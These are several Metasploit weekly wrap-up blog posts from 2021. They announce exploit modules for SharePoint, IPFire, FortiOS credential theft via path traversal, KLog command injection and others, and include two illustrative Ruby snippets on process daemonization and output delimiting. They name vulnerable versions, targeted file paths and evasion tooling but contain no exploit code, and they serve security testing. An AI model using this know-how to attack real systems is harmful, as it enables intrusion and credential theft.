SharePoint, a document management and storage system designed to integrate with Microsoft Office, patched a vuln in May 2021 that allowed authenticated users to perform Remote Code Execution. Our own Spencer McIntyre and wvu authored a PR that allows exploitation of this vulnerability on unpatched systems. The user will need to have the SPBasePermissions.ManageLists permission on the targeted site, but by default users can manually make their own site where that permission will be present.

New module content (4)

  • Emby Version Scanner by Btnz, which exploits CVE-2020-26948 – This PR adds an aux scanner and module to exploit CVE-2020-26948, an SSRF against Emby servers
  • IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE by Grant Willcox and Mücahit Saratar, which exploits CVE-2021-33393 – A new module has been added to exploit CVE-2021-33393, an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior. Successful exploitation results in remote code execution as the root user.
  • HashiCorp Nomad Remote Command Execution by Wyatt Dahlenburg – Adds a new multi/misc/nomad_exec module for HashiCorp’s Nomad product. This module supports the use of the ‘raw_exec’ and ‘exec’ drivers to create a job that spawns a shell.
  • Microsoft SharePoint Unsafe Control and ViewState RCE by wvu, Spencer McIntyre, and Unknown, which exploits ZDI-21-573 – A new exploit for CVE-2021-31181 has been added, which exploits a RCE in SharePoint that was patched in May 2021. Successful exploitation requires the attacker to have login credentials for a SharePoint user who has SPBasePermissions.ManageLists permissions on any SharePoint site, and grants the attacker remote code execution as the user running the SharePoint server.

Enhancements and features

  • #15109 from zeroSteiner – An update has been made so that when a user attempts to load an extension that isn’t available for the current Meterpreter type, they will now receive a list of payloads that would yield a Meterpreter session that would be capable of loading the specified extension. Additionally, when a user runs a command that’s in an extension that hasn’t been loaded yet, Metasploit will now tell the user which extension needs to be loaded for the command to run.
  • #15187 from dwelch-r7 – Updates the msfdb script to now prompt the user before enabling the remote http webservice functionality, defaulting to being disabled. It is still possible to enable this functionality after the fact with msfdb --component webservice init
  • #15316 from zeroSteiner – The assembly stub used by the PrependFork option for Linux payloads has been updated to call setsid(2) in the child process to properly run the payload in the background before calling fork(2) again. This ensures the payload properly runs when the target environment is expecting the command or payload to return, and ensures the payloads better emulate the Mettle payload’s background command to ensure better consistency across payloads.
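
The fork, setsid, fork order that the #15316 item describes is the classic Unix pattern for detaching a process, and it is worth seeing why setsid sits between the two forks. The Ruby below is an added example (not the framework’s assembly stub): the first child becomes leader of a new session, dropping the controlling terminal, and the grandchild it spawns inherits that session without being its leader, so it can never reacquire a terminal. The same properties (a session id that is not the process’s own pid, no tty, parent reparented to init) are what you see in a process listing when triaging a detached process. `spawn_detached` is this example’s own name, not a framework API.

```ruby
require 'json'

# Runs `work` in a grandchild process detached from the caller's session, using
# the same fork -> setsid -> fork order the PrependFork stub follows.
# Returns a Hash describing the detached process as it saw itself.
def spawn_detached(&work)
  reader, writer = IO.pipe
  first_child = Process.fork do
    reader.close
    Process.setsid                  # leader of a NEW session: the controlling tty is dropped here
    Process.fork do
      # grandchild: inherits the new session but is not its leader, so it can
      # never acquire a controlling terminal again (the point of the second fork)
      info = { 'pid' => Process.pid, 'sid' => Process.getsid, 'pgid' => Process.getpgrp }
      writer.puts(JSON.generate(info))
      writer.close
      begin
        work&.call
      ensure
        exit!(0)                    # exit! skips at_exit handlers inherited from the parent
      end
    end
    writer.close
    exit!(0)                        # first child leaves at once; grandchild is reparented to init
  end
  writer.close
  Process.wait(first_child)         # reap the first child so no zombie is left behind
  line = reader.gets
  reader.close
  JSON.parse(line)
end

if __FILE__ == $PROGRAM_NAME
  info = spawn_detached { sleep 0.1 }
  puts "caller sid=#{Process.getsid} detached pid=#{info['pid']} " \
       "sid=#{info['sid']} pgid=#{info['pgid']}"
end
```

Without the setsid call the grandchild would stay in the caller’s session and be taken down with it when that session ends; without the second fork the detached process would itself be a session leader and could reacquire a terminal by opening one.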

Bugs fixed

  • #15319 from pingport80 – This fixes a localization issue in the post/windows/gather/enum_hyperv_vms module where on non-English systems the error message would not match the specified regular expression.
  • #15328 from zeroSteiner – The lib/msf/core/session/provider/single_command_shell.rb library has been updated to address an issue whereby shell_read_until_token may sometimes fail to return output if the randomized token being used to delimit output is contained within the legitimate output as well.
  • #15337 from 0xShoreditch – A bug has been fixed in apache_activemq_upload_jsp.rb whereby the URI and filesystem path were not separated appropriately. Additionally, extra checks were added to handle error conditions that may arise during module operation.
  • #15340 from adfoster-r7 – A bug was identified in lib/msf/ui/console/command_dispatcher/db.rb where the -d flag was not being correctly honored, preventing users from being able to delete hosts from their database. This has now been fixed.
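
The #15328 issue above, as an added example in Ruby (this is not the Metasploit library’s code): a reader that stops at the first occurrence of the delimiter token truncates the output whenever the token text occurs in legitimate data, and the leftover bytes then pollute the next read. The framed variant beside it is one generic mitigation, not necessarily the fix applied in #15328: the remote side base64-encodes the output before appending the token, and the token begins with a character outside the base64 alphabet, so a collision is impossible by construction. All function names and the sample output are this example’s own.

```ruby
require 'securerandom'

# Naive reader: returns everything before the FIRST occurrence of the token and
# consumes it from the buffer. If the real output contains the token text, the
# result is truncated and the remainder is left to corrupt the next read.
def read_until_token_naive(buffer, token)
  idx = buffer.index(token)
  return nil unless idx                 # token not seen yet: caller keeps waiting
  output = buffer[0...idx]
  buffer.slice!(0, idx + token.length)
  output
end

# Framed protocol: the remote side base64-encodes the command output before
# appending the token. The token starts with '#', a byte that never occurs in
# base64 output (A-Z a-z 0-9 + / =), so it cannot collide with encoded data.
TOKEN_PREFIX = '#'

def make_token
  TOKEN_PREFIX + SecureRandom.hex(8)
end

# What the remote end would send back for a command whose raw output is `raw`
# (constructed here to stand in for a real session channel).
def frame_output(raw, token)
  [raw].pack('m0') + token              # 'm0' is strict base64 with no line breaks
end

def read_until_token_framed(buffer, token)
  idx = buffer.index(token)
  return nil unless idx
  encoded = buffer[0...idx]
  buffer.slice!(0, idx + token.length)
  encoded.unpack1('m0')
end

if __FILE__ == $PROGRAM_NAME
  token = make_token
  # Constructed command output that happens to mention the delimiter token.
  raw = "config line one\nnote: delimiter #{token} appears in this file\nconfig line two\n"

  naive_buf = raw.dup + token
  puts "naive:    #{read_until_token_naive(naive_buf, token).inspect}"  # truncated after line one
  puts "leftover: #{naive_buf.inspect}"                                 # spills into the next read

  framed_buf = frame_output(raw, token)
  puts "framed:   #{read_until_token_framed(framed_buf, token) == raw}" # true
end
```

The general lesson is that an in-band delimiter is only safe when the data channel is constrained so the delimiter cannot appear in it; a random token makes a collision unlikely, not impossible, and an attacker-influenced command output is exactly where "unlikely" is not good enough.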

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/03/05/metasploit-wrap-up-101/

FortiOS Path Traversal

Returning community contributor mekhalleh submitted a module targeting a path traversal vulnerability within the SSL VPN web portal in multiple versions of FortiOS. The flaw is leveraged to read the usernames and passwords of currently logged in users which are stored in plaintext on the file system. This vulnerability is identified as CVE-2018-13379 and can be reliably exploited remotely, without any authentication. Despite the fact that the vulnerability is several years old, CVE-2018-13379 is still known to be exploited in the wild, including in state-sponsored attacks targeting U.S. government agencies and infrastructure.

Additional Module Updates

Two modules received improvements to their targeting capabilities. The ever-popular exploit for MS17-010 was updated by zerosum0x0 (one of the original authors) with an updated fingerprint for properly targeting Windows Storage Server 2008. This allows the exploit module to be used against affected versions of that Server 2008 variant. Additionally, a KarjaSoft Sami FTP exploit was updated by long-time community contributor bcoles who made a number of improvements to it but notably updated the exploit to only rely on an offset within a DLL that is distributed with the vulnerable software. When memory corruption exploits need the address of a POP, POP, RET instruction (as this one does for the SEH overwrite), they are more reliable when referencing one that is distributed with the software and won’t change, unlike libraries that come with the host operating system and are regularly updated.

New Modules (1)

  • FortiOS Path Traversal Credential Gatherer by lynx (Carlos Vieira) and mekhalleh (RAMELLA Sébastien), which exploits a directory traversal vulnerability (CVE-2018-13379) in the SSL VPN web portal of FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 to grab the /dev/cmdb/sslvpn_websession file, containing the plaintext list of currently connected usernames and their associated passwords. These credentials can then be saved to the creds database for use in future attacks.

Enhancements and features

  • #14783 from bcoles The KarjaSoft Sami FTP Server v2.0.2 USER Overflow module has been updated with documentation, RuboCop updates, support for the AutoCheck mixin to automatically check if a target is vulnerable, an updated list of authors, as well as improvements to its exploit strategy that allow it to use only one offset within a DLL shipped with the target for exploitation, instead of relying on a Windows OS DLL whose offsets could change as the OS was updated.
  • #14838 from zerosum0x0 The psexec_ms17_010.rb library has been updated to support additionally fingerprinting Windows Storage Server 2008 R2 targets as potentially exploitable targets, thereby allowing users to exploit Windows Storage Server 2008 R2 targets vulnerable to MS17-010.

Bugs Fixed

  • #14816 from dwelch-r7 Ensures that the Faker library is always available for use within modules when generating fake data for bypassing WAF etc.
  • #14821 from space-r7 The search command within Meterpreter has had its logic updated to support searches that start at the root directory, aka /. These types of searches were previously not returning any results due to a logic bug within the code, which has now been fixed.
  • #14840 from dwelch-r7 Removes require rex/ui statement that prevented execution of msfrpc.
  • #14843 from dwelch-r7 With the upgrade to zeitwerk in Metasploit, PseudoShell was not being picked up appropriately, resulting in some modules and tools not being able to load it when needed. A fix has now been applied to make sure that PseudoShell can be appropriately loaded by zeitwerk to prevent missing dependency issues.
  • #14853 from adfoster-r7 Fixes an edge case when upgrading from an older version of Metasploit to Metasploit 6.0.32 when using the Mac Metasploit Omnibus installer directly or indirectly via Brew

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/02/26/metasploit-wrap-up-100/

In this week’s round of modules, contributor bcoles offered up two modules to leverage that Apache Flink install you found in some fun new ways. If you are just looking to filch a few files, auxiliary/scanner/http/apache_flink_jobmanager_traversal leverages CVE-2020-17519 to pilfer the filesystem on Flink versions 1.11.0 through 1.11.2. The second module, for a little extra fun, exploit/multi/http/apache_flink_jar_upload_exec utilizes the job functionality in Flink to run arbitrary Java code as the web server user; turns out there is a meterpreter for that!

RDP: a dream and a nightmare for the sysAdmin near you.

Ever wonder if exposing a remote desktop in a web page was a good idea? I mean, it’s just a web server, the internet loves those. Turns out timing attacks can expose your usernames when someone chooses to pay close attention. A recently contributed module auxiliary/scanner/http/rdp_web_login contributed by Matthew Dunn can even pay attention for you. Using the module you can now enumerate users by setting a few options.

Have you heard of herpaderping?

For those that have, Metasploit now has a new toy for you. Christophe De La Fuente built on some great research by Johnny Shaw, to bring this technique to Metasploit. Using the new evasion/windows/process_herpaderping module, you too can generate Windows PE files that hide the code behind the curtain, if you will, when executed on a target.

Join the community.

For anyone interested in working with Metasploit in this year’s Google Summer of Code, you’ll have to wait until March 9th to find out if we’ve been accepted as mentors. However, you can get a head start by checking out our current project shortlist. Said shortlist is still being worked on, and applicants can suggest their own project ideas, so get looking and see what jumps out at you!

New Modules (4)

Enhancements and features

  • #14784 from bcoles This fixes a bug in the ScadaBR credential dumping module that prevented it from processing response data.
  • #14617 from zeroSteiner The core Meterpreter and console libraries have been updated to better handle cases where a given implementation of Meterpreter may not support a certain command. Now instead of each version of Meterpreter trying to handle invalid commands, which previously led to errors, they will instead check if they support that command and then will throw an error message if they do not support that command. Additionally, the output from running the help or ? command inside the meterpreter prompt has been updated so as to not display a command that a given Meterpreter implementation does not support. Tests have also been updated accordingly to support checking this functionality works as expected.
  • #14670 from adfoster-r7 Word wrapping of Rex tables is now enabled by default for all Rex tables except for those output by the creds and search commands. This feature can optionally be turned off by issuing the features set wrapped_tables false command.
  • #14735 from adfoster-r7 Updates have been made to require all new modules to now pass RuboCop and msftidy.rb checks prior to being merged into the framework. These checks will now be run automatically on PRs to detect issues rather than users having to run these tools manually to detect code quality issues within their contributions.
  • #14740 from zeroSteiner This makes a few improvements to the CVE-2021-3156 module and adds a couple of features that were left out of the first submission due to time constraints (e.g. cleanup and randomisation of the payload library).

Bugs Fixed

  • #14748 from cdelafuente-r7 A bug has been fixed in Auxiliary::AuthBrute that caused a crash when the DB_ALL_USERS or DB_ALL_PASS options were set. This has now been addressed.
  • #14789 from zeroSteiner A bug has been fixed whereby Meterpreter sessions were incorrectly being validated due to the fact that TLV encryption for the session would take place before session verification. The fix now considers Meterpreter sessions valid if they successfully negotiate TLV encryption. This fix also removes the AutoVerifySession datastore option since all valid Meterpreter instances should negotiate TLV encryption automatically.
  • #14802 from dwelch-r7 A bug within the Kiwi library has been fixed whereby commands passed to Kiwi via the kiwi_cmd command in Metasploit were not being properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it two separate commands to execute rather than one space-separated command.
  • #14812 from dwelch-r7 Restores missing requires for SOCKS5 proxy support.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/02/19/metasploit-wrap-up-99/

GSoC Rocks!

In a rare double whammy, one of our 2020 Google Summer of Code (GSoC) participants has authored a PR containing both enhancements & a new module! Improvements to our SQL injection library now allow PostgreSQL injection, and this new functionality has been verified with both a test module AND a fully functioning module exploiting CVE-2019-13375, a (Postgre)SQL Injection vuln in the D-Link Central WiFi Manager allowing both DB dumping and user insertion in all versions before v1.03R0100_BETA6. Big thanks to red0xff for authoring these changes and showing that students can hack it with the best of them.

For anyone interested in working with Metasploit in this year’s Google Summer of Code, you’ll have to wait until March 9th to find out if we’ve been accepted as mentors. However, you can get a head start by checking out our current project shortlist. Said shortlist is still being worked on, and applicants can suggest their own project ideas, so get looking and see what jumps out at you!

King KLog vs Colezilla

Our copious community contributor bcoles has written a new module exploiting CVE-2020-35729, an unauthenticated command injection vulnerability in KLog (an English-translated version of their site can be found here). KLog is a Syslog server providing a time stamp service packaged in a Linux VM, and if Google Translate is to be believed, includes "Kamu SM approved SHA-512 hash algorithm has log signing feature", which is nice. By making a POST request to authenticate.php, the module can perform code execution in the VM via the PHP shell_exec() function. Additionally, the KLog VM configuration allows the apache user to execute sudo without supplying a password, ultimately allowing code execution with root privileges.

Short. Sweet. Screenshot.

Wrapping up this wrapup, timwr has fixed an issue with our Java Meterpreter that prevented screenshots from being taken. As an added bonus, it also prevents uploading a screenshot dll on non-native Windows meterpreter sessions.

New Modules (4)

  • WordPress ChopSlider3 id SQLi Scanner by Callum Murphy, SunCSR, and h00die, which exploits CVE-2020-11530 This adds a new module to exploit a SQL injection vulnerability in the iDangero.us ChopSlider 3 WordPress plugin version 3.4 and prior. It is able to remotely dump usernames and password hashes from the WordPress database without any authentication. This vulnerability is identified as CVE-2020-11530.
  • D-Link Central WiFiManager SQL injection by M3 and Redouane NIBOUCHA, which exploits CVE-2019-13373 GSoC 2020 project supporting SQLi library usage with PostgreSQL. This support comes with a new module utilizing CVE-2019-13373 to dump database information or insert additional users into D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6.
  • Klog Server authenticate.php user Unauthenticated Command Injection by Metin Yunus Kandemir, b3kc4t, and bcoles, which exploits CVE-2020-35729 This adds an exploit module that targets an unauthenticated command injection vulnerability in Klog Server versions 2.4.1 and below. A POST request to authenticate.php can result in code execution on the target due to improper sanitization of the user parameter, which gets passed to the shell_exec() function. Additionally, Klog Server’s configuration allows the apache user to execute sudo without supplying a password, so this exploit ultimately achieves code execution with root privileges.
  • Micro Focus Operations Bridge Manager Local Privilege Escalation by Pedro Ribeiro, which exploits ZDI-20-1326 (CVE-2020-11858) Allows privilege escalation, assuming the victim machine is running a vulnerable version of OBM and the user already has a session on said machine that supports PowerShell. The module writes the payload to a specific folder, then sends a request to the OBM process via the loopback address to trigger payload execution.

Enhancements and features

  • #14733 from adfoster-r7 Adds the latest rubocop rules
  • #14747 from dwelch-r7 Updates exploit/linux/http/saltstack_salt_api_cmd_exec to correctly show failure messages to the user under error scenarios
  • #14756 from bcoles Updates msftidy to warn when a module is missing its Notes metadata
  • #14762 from adfoster-r7 Adds support for ignoring Rubocop’s ExtraSpacing rules for BinData objects

Bugs Fixed

  • #14602 from red0xff Improves length detection for time-based MySQLi injections and expands support for empty strings in hex_encode_strings.
  • #14738 from timwr Fixes multi/manage/shell_to_meterpreter on macOS by using Python reflection to upgrade a shell session on macOS to a meterpreter session, in memory, without dropping a file to disk
  • #14751 from bcoles A bug has been fixed within the msftidy.rb developer tool whereby a typo was preventing several checks from being run against exploit modules to ensure they conformed to standards. This has now been fixed, along with some grammar issues that were noticed in related modules.
  • #14758 from timwr Fixes the platform check in the Meterpreter stdapi screenshot command. This ensures Java Meterpreter can take screenshots on Windows platforms and prevents unnecessarily uploading the screenshot DLL when using the screenshot command on non-native Windows sessions.
  • #14741 from zeroSteiner Fixes typo for exchange_ecp_dlp_policy target

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).